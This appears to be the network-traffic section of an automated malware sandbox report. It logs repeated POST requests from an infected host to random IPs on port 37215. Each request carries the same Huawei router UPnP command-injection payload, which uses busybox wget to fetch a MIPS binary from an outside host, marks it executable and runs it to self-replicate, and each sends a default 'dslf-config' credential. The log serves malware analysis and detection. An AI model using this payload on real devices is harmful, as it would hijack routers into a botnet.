20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1440192.168.2.1547302130.132.96.23137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860472918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1441192.168.2.1547954218.25.122.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860506058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1442192.168.2.1550250197.63.129.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860548973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1443192.168.2.1543650197.208.207.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860574961 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1444192.168.2.1555782197.111.22.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860595942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1445192.168.2.1560202157.242.221.19437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860678911 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1446192.168.2.153538068.52.56.15337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860707045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1447192.168.2.1557410157.90.88.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860733032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1448192.168.2.1540952131.14.218.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860750914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1449192.168.2.1557284197.151.63.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.860946894 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1450192.168.2.1539068146.197.14.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:05.861452103 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
